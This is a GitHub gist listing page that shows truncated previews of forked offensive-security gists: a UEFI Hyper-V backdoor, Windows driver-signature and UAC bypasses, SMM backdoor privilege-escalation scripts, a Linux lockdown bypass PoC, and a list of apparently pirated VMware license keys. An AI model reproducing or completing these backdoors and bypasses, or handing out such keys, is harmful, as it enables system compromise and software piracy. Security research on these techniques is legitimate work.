SkyN9ne SkyN9ne
💚
SkyN9ne
/ command.xml
Created
September 20, 2023 02:45
— forked from georgestephanis/command.xml
How to upload a file to a WordPress site via the XML-RPC API. Pretty easy, no? The attachment page if you want a html wrapper to present the file can be found at the following URL: http://yoursite.com/?attachment_id=722 (I left the ID the successful response in as an example)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <?xml version='1.0' encoding='utf-8'?> | |
| <methodCall> | |
| <methodName>wp.uploadFile</methodName> | |
| <params> | |
| <param><value><string>1</string></value></param> | |
| <param><value><string>username</string></value></param> | |
| <param><value><string>password</string></value></param> | |
| <param> | |
| <value> | |
| <struct> |
SkyN9ne
/ vmwk17key-5000keys-unchecked.txt
Created
October 5, 2023 06:31
— forked from PurpleVibe32/vmwk17key-5000keys-unchecked.txt
5000k+ vmware workstation pro 17 (untested)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| 4U612-DN31H-MJEJ0-0V0Z4-978HD | |
| 5G44H-ACH50-0J4C9-1VC5P-CY0QD | |
| JC000-8G047-MJDF1-0H3E6-8QR5F | |
| JV2NU-0XL5N-0J4Q8-0T0E6-8GH56 | |
| JZ6E0-4R1E0-HJ1Q0-1R8NH-3AK28 | |
| 0Z48K-4X29Q-MJE80-113GK-C7K3A | |
| HF4H0-46K80-MJ8D9-1KAZP-CKK12 | |
| NY69H-2N05P-HJ170-1V1ZM-CG222 | |
| 4C45A-D8J0H-HJ5T0-1T25H-92A76 | |
| 0Z4H2-0WK9K-4JE10-0T9G6-9C8M4 |
SkyN9ne
/ DmaHvBackdoor.c
Created
October 8, 2023 21:22
— forked from Cr4sh/DmaHvBackdoor.c
Hyper-V backdoor for UEFI
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| ********************************************************************* | |
| Part of UEFI DXE driver code that injects Hyper-V VM exit handler | |
| backdoor into the Device Guard enabled Windows 10 Enterprise. | |
| Execution starts from new_ExitBootServices() -- a hook handler | |
| for EFI_BOOT_SERVICES.ExitBootServices() which being called by | |
| winload!OslFwpKernelSetupPhase1(). After DXE phase exit winload.efi | |
| transfers exeution to previously loaded Hyper-V kernel (hvix64.sys) |
SkyN9ne
/ main.c
Created
May 22, 2024 00:03
— forked from maldiohead/main.c
NtLoadEnclaveData Windows 10 RS3 DSE bypass
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "global.h" | |
| HINSTANCE g_hInstance; | |
| HANDLE g_ConOut = NULL; | |
| BOOL g_ConsoleOutput = FALSE; | |
| WCHAR g_BE = 0xFEFF; | |
| RTL_OSVERSIONINFOW g_osv; | |
| #define CI_DLL "ci.dll" |
SkyN9ne
/ kforge.cpp
Created
May 22, 2024 00:08
— forked from Cr4sh/kforge.cpp
Performing arbitrary kernel function calls on HVCI enabled systems with thread context hijacking
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include "stdafx.h" | |
| // vulnerable driver device name | |
| #define EXPL_DEVICE_PATH "\\\\.\\Global\\RTCore64" | |
| // vulnerable driver service and file name | |
| #define EXPL_DRIVER_NAME "RTCore64.sys" | |
| #define EXPL_SERVICE_NAME "RTCore64" | |
| // vulnerable driver IOCTL codes |
SkyN9ne
/ smm_backdoor_hyper_v.py
Created
May 22, 2024 00:11
— forked from Cr4sh/smm_backdoor_hyper_v.py
Example program that uses SMM backdoor to deploy Hyper-V backdoor (see https://github.com/Cr4sh/s6_pcie_microblaze/tree/master/python/payloads/DmaBackdoorHv)
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys, os, time, platform, ctypes | |
| from struct import pack, unpack | |
| from optparse import OptionParser, make_option | |
| import smm_backdoor as bd | |
| # how many seconds to wait for VM exit occur | |
| VM_EXIT_WAIT = 3 |
SkyN9ne
/ smm_backdoor_privesc_win.py
Created
May 22, 2024 02:16
— forked from Cr4sh/smm_backdoor_privesc_win.py
Example program that uses SMM backdoor for local privileges escalation under the Windows
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys, os, platform, ctypes, ctypes.wintypes | |
| from struct import pack, unpack | |
| import smm_backdoor as bd | |
| # MSR register used by swapgs | |
| IA32_KERNEL_GS_BASE = 0xc0000102 |
SkyN9ne
/ smm_backdoor_privesc_linux.py
Created
May 22, 2024 02:17
— forked from Cr4sh/smm_backdoor_privesc_linux.py
Example program that uses SMM backdoor for local privileges escalation under the Linux
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #!/usr/bin/env python | |
| import sys, os, platform, ctypes | |
| from struct import pack, unpack | |
| import smm_backdoor as bd | |
| try: | |
| import capstone |
SkyN9ne
/ expl_msr_ko.py
Created
May 22, 2024 02:19
— forked from Cr4sh/expl_msr_ko.py
msr.ko Linux kernel lockdown bypass PoC
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| import sys, os, mmap, subprocess | |
| from struct import pack, unpack | |
| from ctypes import * | |
| IA32_SYSENTER_ESP = 0x175 | |
| IA32_SYSENTER_EIP = 0x176 | |
| class PyObj(Structure): | |
| _fields_ = [( 'ob_refcnt', c_size_t ), |
SkyN9ne
/ UAC-TokenMagic.ps1
Created
May 22, 2024 02:21
— forked from Cr4sh/UAC-TokenMagic.ps1
UAC Token Magic
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function UAC-TokenMagic { | |
| <# | |
| .SYNOPSIS | |
| Based on James Forshaw's three part post on UAC, linked below, and possibly a technique | |
| used by the CIA! | |
| Essentially we duplicate the token of an elevated process, lower it's mandatory | |
| integrity level, use it to create a new restricted token, impersonate it and | |
| use the Secondary Logon service to spawn a new process with High IL. Like | |
| playing hide-and-go-seek with tokens! ;)) |